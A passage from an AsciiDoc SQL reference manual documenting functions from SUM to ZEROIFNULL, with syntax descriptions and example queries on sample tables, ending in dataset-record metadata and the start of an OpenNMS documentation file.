The valid expressions\r\nare:\r\n\r\n```\r\nSUM (SALARY)\r\nSUM (SALARY * 1.1)\r\nSUM (PARTCOST * QTY_ORDERED)\r\n```\r\n\r\n[[examples_of_sum]]\r\n=== Examples of SUM\r\n\r\n* Compute the total value of parts in the current inventory:\r\n+\r\n```\r\nSELECT SUM (price * qty_available) FROM sales.parts;\r\n\r\n(EXPR)\r\n---------------------\r\n 117683505.96\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[tan_function]]\r\n== TAN Function\r\n\r\nThe TAN function returns the tangent of a numeric value expression,\r\nwhere the expression is an angle expressed in radians.\r\n\r\nTAN is a {project-name} SQL extension.\r\n\r\n```\r\nTAN (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the TAN function.\r\nSee <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_tan]]\r\n=== Examples of TAN\r\n\r\n* This function returns the value 3.64008908293626880E-001, or\r\napproximately 0.3640, the tangent of 0.3491 (which is 20 degrees):\r\n+\r\n```\r\nTAN (0.3491)\r\n```\r\n\r\n<<<\r\n[[tanh_function]]\r\n== TANH Function\r\n\r\nThe TANH function returns the hyperbolic tangent of a numeric value\r\nexpression, where the expression is an angle expressed in radians.\r\n\r\nTANH is a {project-name} SQL extension.\r\n\r\n```\r\nTANH (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the TANH\r\nfunction. See <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_tanh]]\r\n=== Examples of TANH\r\n\r\n* This function returns the value 8.48283639957512960E-001, or\r\napproximately 0.8483, the hyperbolic tangent of 1.25:\r\n+\r\n```\r\nTANH (1.25)\r\n```\r\n\r\n<<<\r\n[[this_function]]\r\n== THIS Function\r\n\r\nThe THIS function is a sequence function that is used in the ROWS SINCE\r\nfunction to distinguish between the value of the column in the current\r\nrow and the value of the column in previous rows (in an intermediate\r\nresult table ordered by a SEQUENCE BY clause in a SELECT statement).\r\nSee <<rows_since_function,ROWS SINCE Function>>.\r\n\r\nTHIS is a {project-name} SQL extension.\r\n\r\n```\r\nTHIS (column-expression)\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression. If the value of the expression is null, THIS returns null.\r\n\r\n[[considerations_for_this]]\r\n=== Considerations for THIS\r\n\r\n[[counting_the_rows_this]]\r\n==== Counting the Rows\r\n\r\nYou can use the THIS function only within the ROWS SINCE function. For\r\neach row, the ROWS SINCE condition is evaluated in two steps:\r\n\r\n\r\n1. The expression for THIS is evaluated for the current row. This value\r\nbecomes a constant.\r\n2. The condition is evaluated for the result table, using a combination\r\nof the THIS constant and the data for each row in the result table,\r\nstarting with the previous row as row 1 (up to the maximum number of\r\nrows or the size of the result table).\r\n\r\n\r\nIf a row is reached where the condition is true, ROWS SINCE returns the\r\nnumber of rows counted so far.
Otherwise, if the condition is never true\r\nwithin the result table being considered, ROWS SINCE returns null.\r\n{project-name} SQL then goes to the next row as the new current row and the\r\nTHIS constant is reevaluated.\r\n\r\n<<<\r\n[[examples_of_this]]\r\n=== Examples of THIS\r\n\r\n* Return the number of rows since the condition _THIS(i1) < i1_ (that is,\r\nthe current row's value of _i1_ is less than a previous row's value)\r\nbecame true:\r\n+\r\n```\r\nSELECT ROWS SINCE (THIS(i1) < i1) AS rows_since_this\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nrows_since_this\r\n---------------\r\n ?\r\n ?\r\n 1\r\n 1\r\n ?\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[timestampadd_function]]\r\n== TIMESTAMPADD Function\r\n\r\nThe TIMESTAMPADD function adds the interval of time specified by\r\n_interval-ind_ and _num-expr_ to _datetime-expr_. If the specified\r\ninterval is in years, months, or quarters and the resulting date is not\r\na valid date, the day will be rounded down to the last day of the result\r\nmonth. The type of the _datetime-expr_ is returned except when the\r\n_interval-ind_ contains any time component, in which case a TIMESTAMP is\r\nreturned.\r\n\r\nTIMESTAMPADD is a {project-name} SQL extension.\r\n\r\n```\r\nTIMESTAMPADD (interval-ind, num-expr, datetime-expr)\r\n```\r\n\r\n* `_interval-ind_`\r\n+\r\nis SQL_TSI_YEAR, SQL_TSI_MONTH, SQL_TSI_DAY, SQL_TSI_HOUR,\r\nSQL_TSI_MINUTE, SQL_TSI_SECOND, SQL_TSI_QUARTER, or SQL_TSI_WEEK.\r\n\r\n* `_num-expr_`\r\n+\r\nis an SQL exact numeric value expression that specifies how many\r\n_interval-ind_ units of time are to be added to _datetime-expr_. If\r\n_num-expr_ has a fractional portion, it is ignored. If _num-expr_ is\r\nnegative, the return value precedes _datetime-expr_ by the specified\r\namount of time.\r\n\r\n* `_datetime-expr_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. The type of the _datetime-expr_ is returned except when the\r\n_interval-ind_ contains any time component, in which case a TIMESTAMP is\r\nreturned.\r\n\r\n<<<\r\n[[examples_of_timestampadd]]\r\n=== Examples of TIMESTAMPADD\r\n\r\n* This function adds seven days to the date specified in _start-date_:\r\n+\r\n```\r\nTIMESTAMPADD (SQL_TSI_DAY, 7, start-date)\r\n```\r\n\r\n* This function returns the value DATE '2008-03-06':\r\n+\r\n```\r\nTIMESTAMPADD (SQL_TSI_WEEK, 1, DATE '2008-02-28')\r\n```\r\n\r\n* This function returns the value DATE '1999-02-28':\r\n+\r\n```\r\nTIMESTAMPADD (SQL_TSI_YEAR, -1, DATE '2000-02-29')\r\n```\r\n\r\n* This function returns the value TIMESTAMP '2003-02-28 13:27:35':\r\n+\r\n```\r\nTIMESTAMPADD (SQL_TSI_MONTH, -12, TIMESTAMP '2004-02-29 13:27:35')\r\n```\r\n\r\n* This function returns the value TIMESTAMP '2004-02-28 13:27:35':\r\n+\r\n```\r\nTIMESTAMPADD (SQL_TSI_MONTH, 12, TIMESTAMP '2003-02-28 13:27:35')\r\n```\r\n\r\n* This function returns the value DATE '2008-06-30':\r\n+\r\n```\r\nTIMESTAMPADD (SQL_TSI_QUARTER, -2, DATE '2008-12-31')\r\n```\r\n\r\n* This function returns the value TIMESTAMP '2008-06-30 23:59:55':\r\n+\r\n```\r\nTIMESTAMPADD (SQL_TSI_SECOND, -5, DATE '2008-07-01')\r\n```\r\n\r\n<<<\r\n[[timestampdiff_function]]\r\n== TIMESTAMPDIFF Function\r\n\r\nThe TIMESTAMPDIFF function returns the integer value for the number of\r\n_interval-ind_ units of time between _startdate_ and _enddate_.
If\r\n_enddate_ precedes _startdate_, the return value is negative or zero.\r\n\r\n```\r\nTIMESTAMPDIFF (interval-ind, startdate, enddate)\r\n```\r\n\r\n* `_interval-ind_`\r\n+\r\nis SQL_TSI_YEAR, SQL_TSI_MONTH, SQL_TSI_DAY, SQL_TSI_HOUR,\r\nSQL_TSI_MINUTE, SQL_TSI_SECOND, SQL_TSI_QUARTER, or SQL_TSI_WEEK.\r\n\r\n* `_startdate_` and `_enddate_`\r\n+\r\nare each of type DATE or TIMESTAMP.\r\n\r\nThe method of counting crossed boundaries such as days, minutes, and\r\nseconds makes the result given by TIMESTAMPDIFF consistent across all\r\ndata types. The TIMESTAMPDIFF function makes these boundary assumptions:\r\n\r\n* A year begins at the start of January 1.\r\n* A new quarter begins on January 1, April 1, July 1, and October 1.\r\n* A week begins at the start of Sunday.\r\n* A day begins at midnight.\r\n\r\nThe result is a signed integer value equal to the number of\r\n_interval-ind_ boundaries crossed between the first and second date. For\r\nexample, the number of weeks between Sunday, January 4, and Sunday,\r\nJanuary 11, is 1. The number of months between March 31 and April 1 would\r\nbe 1 because the month boundary is crossed from March to April.\r\n\r\nThe TIMESTAMPDIFF function generates an error if the result is out of\r\nrange for integer values. For seconds, the maximum number is equivalent\r\nto approximately 68 years. The TIMESTAMPDIFF function generates an error\r\nif a difference in weeks is requested and one of the two dates precedes\r\nJanuary 7 of the year 0001.\r\n\r\n<<<\r\n[[examples_of_timestampdiff]]\r\n=== Examples of TIMESTAMPDIFF\r\n\r\n* This function returns the value 1 because a 1-second boundary is\r\ncrossed even though the two timestamps differ by only one microsecond:\r\n+\r\n```\r\nTIMESTAMPDIFF\r\n(\r\n SQL_TSI_SECOND\r\n, TIMESTAMP '2006-09-12 11:59:58.999999'\r\n, TIMESTAMP '2006-09-12 11:59:59.000000'\r\n)\r\n```\r\n\r\n* This function returns the value 0 because no year boundaries are\r\ncrossed:\r\n+\r\n```\r\nTIMESTAMPDIFF\r\n( SQL_TSI_YEAR\r\n, TIMESTAMP '2006-12-31 23:59:59.000000'\r\n, TIMESTAMP '2006-12-31 23:59:59.999999'\r\n)\r\n```\r\n\r\n* This function returns the value 1 because a year boundary is crossed:\r\n+\r\n```\r\nTIMESTAMPDIFF\r\n( SQL_TSI_YEAR\r\n, TIMESTAMP '2006-12-31 23:59:59.999999'\r\n, TIMESTAMP '2007-01-01 00:00:00.000000'\r\n)\r\n```\r\n\r\n* This function returns the value 1 because a WEEK boundary is crossed:\r\n+\r\n```\r\nTIMESTAMPDIFF (SQL_TSI_WEEK, DATE '2006-01-01', DATE '2006-01-09')\r\n```\r\n\r\n* This function returns the value -29:\r\n+\r\n```\r\nTIMESTAMPDIFF (SQL_TSI_DAY, DATE '2004-03-01', DATE '2004-02-01')\r\n```\r\n\r\n<<<\r\n[[translate_function]]\r\n== TRANSLATE Function\r\n\r\nThe TRANSLATE function translates a character string from a source\r\ncharacter set to a target character set. The TRANSLATE function changes\r\nboth the character string data type and the character set encoding of\r\nthe string.\r\n\r\n```\r\nTRANSLATE(character-value-expression USING translation-name)\r\n```\r\n\r\n* `_character-value-expression_`\r\n+\r\nis a character string.\r\n\r\n* `_translation-name_`\r\n+\r\nis one of these translation names:\r\n+\r\n[cols=\"25%l,25%l,25%l,25%\",options=\"header\"]\r\n|===\r\n| Translation Name | Source Character Set | Target Character Set | Comments\r\n| ISO88591TOUTF8 | ISO88591 | UTF8 | Translates ISO88591 characters to UTF8 characters. No data loss is possible.\r\n| UTF8TOISO88591 | UTF8 | ISO88591 | Translates UTF8 characters to ISO88591 characters.
{project-name} SQL will\r\ndisplay an error if it encounters a Unicode character that cannot be converted to the target character set.\r\n|===\r\n\r\n_translation-name_ identifies the translation, source and target\r\ncharacter set. When you translate to the UTF8 character set, no data\r\nloss is possible. However, when {project-name} SQL translates a\r\n_character-value-expression_ from UTF8, it may be that certain\r\ncharacters cannot be converted to the target character set. {project-name}\r\nSQL reports an error in this case.\r\n\r\n{project-name} SQL returns a variable-length character string with character\r\nrepertoire equal to the character repertoire of the target character set\r\nof the translation and the maximum length equal to the fixed length or\r\nmaximum variable length of the source _character-value-expression_.\r\n\r\nIf you enter an illegal _translation-name_, {project-name} SQL returns an\r\nerror.\r\n\r\nIf the character set for _character-value-expression_ is different from\r\nthe source character set as specified in the _translation-name_,\r\n{project-name} SQL returns an error.
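\r\n\r\n[[examples_of_translate]]\r\n=== Examples of TRANSLATE\r\n\r\n* As an illustrative sketch (assuming _custname_ is an ISO88591 column in\r\nthe SALES.CUSTOMER sample table used elsewhere in this manual), this\r\nquery translates customer names to UTF8:\r\n+\r\n```\r\nSELECT TRANSLATE (custname USING ISO88591TOUTF8)\r\nFROM sales.customer;\r\n```\r\n+\r\nTranslating in the other direction, with UTF8TOISO88591, raises an error\r\nfor any character that cannot be represented in ISO88591.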
\r\n\r\n<<<\r\n[[trim_function]]\r\n== TRIM Function\r\n\r\nThe TRIM function removes leading and trailing characters from a\r\ncharacter string. Every character, including multi-byte characters, is\r\ntreated as one character.\r\n\r\n```\r\nTRIM ([[trim-type] [trim-char] FROM] trim-source)\r\n```\r\n\r\n* `_trim-type_` is:\r\n+\r\n```\r\nLEADING | TRAILING | BOTH\r\n```\r\n\r\n* `_trim-type_`\r\n+\r\nspecifies whether characters are to be trimmed from the leading end\r\n(LEADING), trailing end (TRAILING), or both ends (BOTH) of\r\n_trim-source_. If you omit _trim-type_, the default is BOTH.\r\n\r\n* `_trim-char_`\r\n+\r\nis an SQL character value expression and specifies the character to be\r\ntrimmed from _trim-source_. _trim-char_ has a maximum length of 1. If you omit\r\n_trim-char_, SQL trims blanks (' ') from _trim-source_.\r\n\r\n* `_trim-source_`\r\n+\r\nis an SQL character value expression and specifies the string from which\r\nto trim characters. See <<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[considerations_for_trim]]\r\n=== Considerations for TRIM\r\n\r\n[[result_of_trim]]\r\n==== Result of TRIM\r\n\r\nThe result is always of type VARCHAR, with maximum length equal to the\r\nfixed length or maximum variable length of _trim-source_. If the\r\nsource character string is an up-shifted CHAR or VARCHAR string, the\r\nresult is an up-shifted VARCHAR type.\r\n\r\n<<<\r\n[[examples_of_trim]]\r\n=== Examples of TRIM\r\n\r\n* Return 'Robert':\r\n+\r\n```\r\nTRIM(' Robert ')\r\n```\r\n\r\n* The EMPLOYEE table defines FIRST_NAME as CHAR(15) and LAST_NAME as\r\nCHAR(20). This expression uses the TRIM function to return the value\r\n'Robert Smith' without extra blanks:\r\n+\r\n```\r\nTRIM(first_name) || ' ' || TRIM (last_name)\r\n```\r\n\r\n<<<\r\n[[ucase_function]]\r\n== UCASE Function\r\n\r\nThe UCASE function up-shifts alphanumeric characters. For\r\nnon-alphanumeric characters, UCASE returns the same character. UCASE can\r\nappear anywhere in a query where a value can be used, such as in a\r\nselect list, an ON clause, a WHERE clause, a HAVING clause, a LIKE\r\npredicate, an expression, or as qualifying a new value in an UPDATE or\r\nINSERT statement. The result returned by the UCASE function is equal to\r\nthe result returned by the <<upper_function,UPPER Function>>\r\nor <<upshift_function,UPSHIFT Function>>.\r\n\r\nUCASE returns a string of fixed-length or variable-length character\r\ndata, depending on the data type of the input string.\r\n\r\nUCASE is a {project-name} SQL extension.\r\n\r\n```\r\nUCASE (character-expression)\r\n```\r\n\r\n* `_character-expression_`\r\n+\r\nis an SQL character value expression that specifies a string of\r\ncharacters to upshift. See <<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[considerations_for_ucase]]\r\n=== Considerations for UCASE\r\n\r\nFor a UTF8 _character-expression_, the UCASE function up-shifts all\r\nlowercase or title case characters to uppercase and returns a character\r\nstring. If the argument is of type CHAR(_n_) or VARCHAR(_n_), the\r\nresult is of type VARCHAR(min(3_n_, 2048)); that is, the maximum length\r\nof the result is the smaller of 3_n_ and 2048.\r\n\r\nA lowercase character is a character that has the \"alphabetic\" property\r\nin Unicode Standard 2 and whose Unicode name includes _lower_. An\r\nuppercase character is a character that has the \"alphabetic\" property\r\nand whose Unicode name includes _upper_. A title case character is a\r\ncharacter that has the Unicode \"alphabetic\" property and whose Unicode\r\nname includes _title_.\r\n\r\n<<<\r\n[[examples_of_ucase]]\r\n=== Examples of UCASE\r\n\r\n* Suppose that your CUSTOMER table includes an entry for Hotel Oregon.\r\nSelect the column CUSTNAME and return it in uppercase and lowercase letters\r\nby using the UCASE and LCASE functions:\r\n+\r\n```\r\nSELECT custname,UCASE(custname),LCASE(custname) FROM sales.customer;\r\n\r\n(EXPR) (EXPR) (EXPR)\r\n----------------- ------------------- ------------------\r\n... ... ...\r\nHotel Oregon HOTEL OREGON hotel oregon\r\n\r\n--- 17 row(s) selected.\r\n```\r\n+\r\nSee <<lcase_function,LCASE Function>>.\r\n\r\n<<<\r\n[[upper_function]]\r\n== UPPER Function\r\n\r\nThe UPPER function up-shifts alphanumeric characters. For\r\nnon-alphanumeric characters, UPPER returns the same character. UPPER can\r\nappear anywhere in a query where a value can be used, such as in a\r\nselect list, an ON clause, a WHERE clause, a HAVING clause, a LIKE\r\npredicate, an expression, or as qualifying a new value in an UPDATE or\r\nINSERT statement. The result returned by the UPPER function is equal to\r\nthe result returned by the <<upshift_function,UPSHIFT Function>> or <<ucase_function,UCASE Function>>.\r\n\r\nUPPER returns a string of fixed-length or variable-length character\r\ndata, depending on the data type of the input string.\r\n\r\n```\r\nUPPER (character-expression)\r\n```\r\n\r\n* `_character-expression_`\r\n+\r\nis an SQL character value expression that specifies a string of\r\ncharacters to upshift.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[examples_of_upper]]\r\n=== Examples of UPPER\r\n\r\n* Suppose that your CUSTOMER table includes an entry for Hotel Oregon.\r\nSelect the column CUSTNAME and return it in uppercase and lowercase letters\r\nby using the UPPER and LOWER functions:\r\n+\r\n```\r\nSELECT custname,UPPER(custname),LOWER(custname) FROM sales.customer;\r\n\r\n(EXPR) (EXPR) (EXPR)\r\n----------------- ------------------- ------------------\r\n... ...
...\r\nHotel Oregon HOTEL OREGON hotel oregon\r\n\r\n--- 17 row(s) selected.\r\n```\r\n+\r\nSee <<lower_function,LOWER Function>>.\r\n+\r\nFor examples of when to use the UPPER function,\r\nsee <<upshift_function,UPSHIFT Function>>.\r\n\r\n<<<\r\n[[upshift_function]]\r\n== UPSHIFT Function\r\n\r\nThe UPSHIFT function up-shifts alphanumeric characters. For\r\nnon-alphanumeric characters, UPSHIFT returns the same character. UPSHIFT\r\ncan appear anywhere in a query where a value can be used, such as in a\r\nselect list, an ON clause, a WHERE clause, a HAVING clause, a LIKE\r\npredicate, an expression, or as qualifying a new value in an UPDATE or\r\nINSERT statement. The result returned by the UPSHIFT function is equal\r\nto the result returned by the <<upper_function,UPPER Function>> or\r\n<<ucase_function,UCASE Function>>.\r\n\r\nUPSHIFT returns a string of fixed-length or variable-length character\r\ndata, depending on the data type of the input string.\r\n\r\nUPSHIFT is a {project-name} SQL extension.\r\n\r\n```\r\nUPSHIFT (character-expression)\r\n```\r\n* `_character-expression_`\r\n+\r\nis an SQL character value expression that specifies a string of\r\ncharacters to upshift. See\r\n<<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[examples_of_upshift]]\r\n=== Examples of UPSHIFT\r\n\r\n* Suppose that your CUSTOMER table includes an entry for Hotel Oregon.\r\nSelect the column CUSTNAME and return the result in uppercase letters by\r\nusing the UPSHIFT, UPPER, and UCASE functions:\r\n+\r\n```\r\nSELECT UPSHIFT(custname), UPPER(custname), UCASE(custname)\r\nFROM sales.customer;\r\n\r\n(EXPR) (EXPR) (EXPR)\r\n----------------- ------------------- ------------------\r\n... ... ...\r\nHOTEL OREGON HOTEL OREGON HOTEL OREGON\r\n\r\n--- 17 row(s) selected.\r\n```\r\n\r\n<<<\r\n* Perform a case-insensitive search for the DataSpeed customer:\r\n+\r\n```\r\nSELECT *\r\nFROM sales.customer\r\nWHERE UPSHIFT (custname) = 'DATASPEED';\r\n\r\nCUSTNAME STREET CITY ...\r\n---------- -------------------- --------- ...\r\nDataSpeed 300 SAN GABRIEL WAY NEW YORK ...\r\n\r\n--- 1 row(s) selected.\r\n```\r\n+\r\nIn the table, the name can be in lowercase, uppercase, or mixed case letters.\r\n\r\n* Suppose that your database includes two department tables: DEPT1 and\r\nDEPT2. Return all rows from the two tables in which the department names\r\nhave the same value regardless of case:\r\n+\r\n```\r\nSELECT *\r\nFROM persnl.dept1 D1, persnl.dept2 D2\r\nWHERE UPSHIFT(D1.deptname) = UPSHIFT(D2.deptname);\r\n```\r\n\r\n<<<\r\n[[user_function]]\r\n== USER Function\r\n\r\nThe USER function returns either the database user name associated with\r\nthe specified user ID number or the database user name of the current\r\nuser who invoked the function. The current user is the authenticated\r\nuser who started the session.
That database\r\nuser name is used for authorization of SQL statements in the current\r\nsession.\r\n\r\n```\r\nUSER [(user-id)]\r\n```\r\n\r\n* `_user-id_`\r\n+\r\nis the 32-bit number associated with a database user name.\r\n+\r\nThe USER function is similar to the <<authname_function,AUTHNAME Function>>\r\nand the <<current_user_function,CURRENT USER Function>>.\r\n\r\n[[considerations_for_user]]\r\n=== Considerations for USER\r\n\r\n* This function can be specified only in the top level of a SELECT statement.\r\n* The value returned is string data type VARCHAR(128) and is in ISO8859-1 encoding.\r\n\r\n[[examples_of_user]]\r\n=== Examples of USER\r\n\r\n* This example shows the database user name of the current user who is\r\nlogged in to the session:\r\n+\r\n```\r\nSELECT USER FROM (values(1)) x(a);\r\n\r\n(EXPR)\r\n-------------------------\r\nTSHAW\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n* This example shows the database user name associated with the user ID number, 33333:\r\n+\r\n```\r\nSELECT USER (33333) FROM (values(1)) x(a);\r\n\r\n(EXPR)\r\n-------------------------\r\nDB ROOT\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[variance_function]]\r\n== VARIANCE Function\r\n\r\nVARIANCE is an aggregate function that returns the statistical variance\r\nof a set of numbers. VARIANCE is a {project-name} SQL extension.\r\n\r\n```\r\nVARIANCE ([ALL | DISTINCT] expression [, weight])\r\n```\r\n\r\n* `ALL | DISTINCT`\r\n+\r\nspecifies whether duplicate values are included in the computation of\r\nthe VARIANCE of the _expression_. The default option is ALL, which\r\ncauses duplicate values to be included. If you specify DISTINCT,\r\nduplicate values are eliminated before the VARIANCE function is applied.\r\nIf DISTINCT is specified, you cannot specify _weight_.\r\n\r\n* `_expression_`\r\n+\r\nspecifies a numeric value expression that determines the values for\r\nwhich to compute the variance. _expression_ cannot contain an aggregate\r\nfunction or a subquery. The DISTINCT clause specifies that the VARIANCE\r\nfunction operates on distinct values from the one-column table derived\r\nfrom the evaluation of _expression_.\r\n\r\n* `_weight_`\r\n+\r\nspecifies a numeric value expression that determines the weights of the\r\nvalues for which to compute the variance. _weight_ cannot contain an\r\naggregate function or a subquery. _weight_ is defined on the same table\r\nas _expression_. The one-column table derived from the evaluation of\r\n_expression_ and the one-column table derived from the evaluation of\r\n_weight_ must have the same cardinality.\r\n\r\n[[considerations_for_variance]]\r\n=== Considerations for VARIANCE\r\n\r\n[[definition_of_variance]]\r\n==== Definition of VARIANCE\r\n\r\nSuppose that _vi_ are the values in the one-column table derived from\r\nthe evaluation of _expression_. _N_ is the cardinality of this\r\none-column table that is the result of applying the _expression_ to each\r\nrow of the source table and eliminating rows that are null.\r\n\r\nIf _weight_ is specified, _wi_ are the values derived from the\r\nevaluation of _weight_. 
_N_ is the cardinality of the two-column table\r\nthat is the result of applying the _expression_ and _weight_ to each row\r\nof the source table and eliminating rows that have nulls in either\r\ncolumn.\r\n\r\n===== Definition When Weight Is Not Specified\r\n\r\nIf _weight_ is not specified, the statistical variance of the values in\r\nthe one-column result table is defined as:\r\n\r\nvariance = SUM( (v~i~ - v)^2^ ) \/ (N - 1), summed over i = 1, ..., N\r\n\r\nwhere _vi_ is the i-th value of _expression_, _v_ is the average value\r\nexpressed in the common data type, and _N_ is the cardinality of the\r\nresult table.\r\n\r\nBecause the definition of variance has _N-1_ in the denominator of the\r\nexpression (when weight is not specified), {project-name} SQL returns a\r\ndefault value of zero (and no error) if the number of rows in the table,\r\nor a group of the table, is equal to 1.\r\n\r\n===== Definition When Weight Is Specified\r\n\r\nIf _weight_ is specified, the statistical variance of the values in the\r\ntwo-column result table is defined as:\r\n\r\nvariance = SUM( w~i~ * (v~i~ - v~w~)^2^ ) \/ N, summed over i = 1, ..., N\r\n\r\nwhere _vi_ is the i-th value of _expression_, _wi_ is the i-th value of\r\n_weight_, _vw_ is the weighted average value expressed in the common\r\ndata type, and _N_ is the cardinality of the result table.\r\n\r\n===== Weighted Average\r\n\r\nThe weighted average _vw_ of _vi_ and _wi_ is defined as:\r\n\r\nv~w~ = SUM( w~i~ * v~i~ ) \/ SUM( w~i~ ), summed over i = 1, ..., N\r\n\r\nwhere _vi_ is the i-th value of _expression_, _wi_ is the i-th value of\r\n_weight_, and _N_ is the cardinality of the result table.\r\n\r\n\r\n[[data_type_of_the_result_variance]]\r\n==== Data Type of the Result\r\n\r\nThe data type of the result is always DOUBLE PRECISION.\r\n\r\n\r\n[[operands_of_the_expression_variance]]\r\n==== Operands of the Expression\r\n\r\nThe expression includes columns from the rows of the SELECT result\r\ntable but cannot include an aggregate function. These expressions are\r\nvalid:\r\n\r\n```\r\nVARIANCE (SALARY)\r\nVARIANCE (SALARY * 1.1)\r\nVARIANCE (PARTCOST * QTY_ORDERED)\r\n```\r\n\r\n[[variance_nulls]]\r\n==== Nulls\r\n\r\nVARIANCE is evaluated after eliminating all nulls from the set. If the\r\nresult table is empty, VARIANCE returns NULL.\r\n\r\n\r\n[[float54_and_double_precision_data_variance]]\r\n==== FLOAT(54) and DOUBLE PRECISION Data\r\n\r\nAvoid using large FLOAT(54) or DOUBLE PRECISION values as arguments to\r\nVARIANCE. If SUM(x * x) exceeds the value of 1.15792089237316192e77 during\r\nthe computation of VARIANCE(x), then a numeric overflow occurs.\r\n\r\n[[examples_of_variance]]\r\n=== Examples of VARIANCE\r\n\r\n* Compute the variance of the salary of the current employees:\r\n+\r\n```\r\nSELECT VARIANCE(salary) AS Variance_Salary FROM persnl.employee;\r\n\r\nVARIANCE_SALARY\r\n-------------------------\r\n 1.27573263588496116E+009\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n* Compute the variance of the cost of parts in the current inventory:\r\n+\r\n```\r\nSELECT VARIANCE (price * qty_available) FROM sales.parts;\r\n\r\n(EXPR)\r\n-------------------------\r\n 5.09652410092950336E+013\r\n\r\n--- 1 row(s) selected.\r\n```
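\r\n\r\n* The examples above do not use _weight_. As an illustrative sketch\r\n(output not shown because it depends on the data), this query weights\r\neach part's price by the quantity available:\r\n+\r\n```\r\nSELECT VARIANCE (price, qty_available) FROM sales.parts;\r\n```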
\r\n<<<\r\n[[week_function]]\r\n== WEEK Function\r\n\r\nThe WEEK function converts a DATE or TIMESTAMP expression into an\r\nINTEGER value in the range 1 through 54 that represents the\r\ncorresponding week of the year. If the year begins on a Sunday, the\r\nvalue 1 will be returned for any datetime that occurs in the first 7\r\ndays of the year. Otherwise, the value 1 will be returned for any\r\ndatetime that occurs in the partial week before the start of the first\r\nSunday of the year. The value 53 is returned for datetimes that occur in\r\nthe last full or partial week of the year except for leap years that\r\nstart on Saturday where December 31 is in the 54th full or partial week.\r\nFor example, if January 1 falls on a Wednesday, the first Sunday of the\r\nyear is January 5, so WEEK returns 1 for January 1 through 4 and 2 for\r\nJanuary 5 through 11.\r\n\r\nWEEK is a {project-name} SQL extension.\r\n\r\n```\r\nWEEK (datetime-expression)\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[examples_of_week]]\r\n=== Examples of WEEK\r\n\r\n* Return an integer that represents the week of the year from the\r\nSTART_DATE column in the PROJECT table:\r\n+\r\n```\r\nSELECT start_date, ship_timestamp, WEEK(start_date)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nStart\/Date Time\/Shipped (EXPR)\r\n---------- -------------------------- --------------\r\n2008-04-10 2008-04-21 08:15:00.000000 15\r\n```\r\n\r\n<<<\r\n[[year_function]]\r\n== YEAR Function\r\n\r\nThe YEAR function converts a DATE or TIMESTAMP expression into an\r\nINTEGER value that represents the year.\r\n\r\nYEAR is a {project-name} SQL extension.\r\n\r\n```\r\nYEAR (datetime-expression)\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[examples_of_year]]\r\n=== Examples of YEAR\r\n\r\n* Return an integer that represents the year from the start date column in\r\nthe project table:\r\n+\r\n```\r\nSELECT start_date, ship_timestamp, YEAR(start_date)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nStart\/Date Time\/Shipped (EXPR)\r\n---------- -------------------------- ------\r\n2008-04-10 2008-04-21 08:15:00.000000 2008\r\n```\r\n\r\n\r\n<<<\r\n[[zeroifnull_function]]\r\n== ZEROIFNULL Function\r\n\r\nThe ZEROIFNULL function returns a value of zero if the expression is\r\nNULL. Otherwise, it returns the value of the expression.\r\n\r\n```\r\nZEROIFNULL (expression)\r\n```\r\n\r\n* `_expression_`\r\n+\r\nspecifies a value expression. It must be a numeric data type.\r\n
\r\n[[examples_of_zeroifnull]]\r\n=== Examples of ZEROIFNULL\r\n\r\n* ZEROIFNULL returns the value of the column named salary whenever the\r\ncolumn value is not NULL and it returns 0 whenever the column value is\r\nNULL.\r\n+\r\n```\r\nZEROIFNULL (salary)\r\n```\r\n\r\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1f3cb70f73c3a73eb4e1e4a9943509f5e2f003af","subject":"Update cheat-sheets.adoc","message":"Update cheat-sheets.adoc","repos":"roskens\/opennms-pre-github,rdkgit\/opennms,rdkgit\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,aihua\/opennms,rdkgit\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,roskens\/opennms-pre-github,roskens\/opennms-pre-github,roskens\/opennms-pre-github,roskens\/opennms-pre-github,roskens\/opennms-pre-github,rdkgit\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,rdkgit\/opennms,aihua\/opennms,rdkgit\/opennms,rdkgit\/opennms,aihua\/opennms,roskens\/opennms-pre-github,aihua\/opennms,rdkgit\/opennms,rdkgit\/opennms,aihua\/opennms,roskens\/opennms-pre-github","old_file":"opennms-doc\/guide-doc\/src\/asciidoc\/text\/cheat-sheets.adoc","new_file":"opennms-doc\/guide-doc\/src\/asciidoc\/text\/cheat-sheets.adoc","new_contents":"\n[[doc-guidelines-cheat-sheets]]\n== Cheat Sheets and additional hints\n\nFor instructions on how to build your own version of the 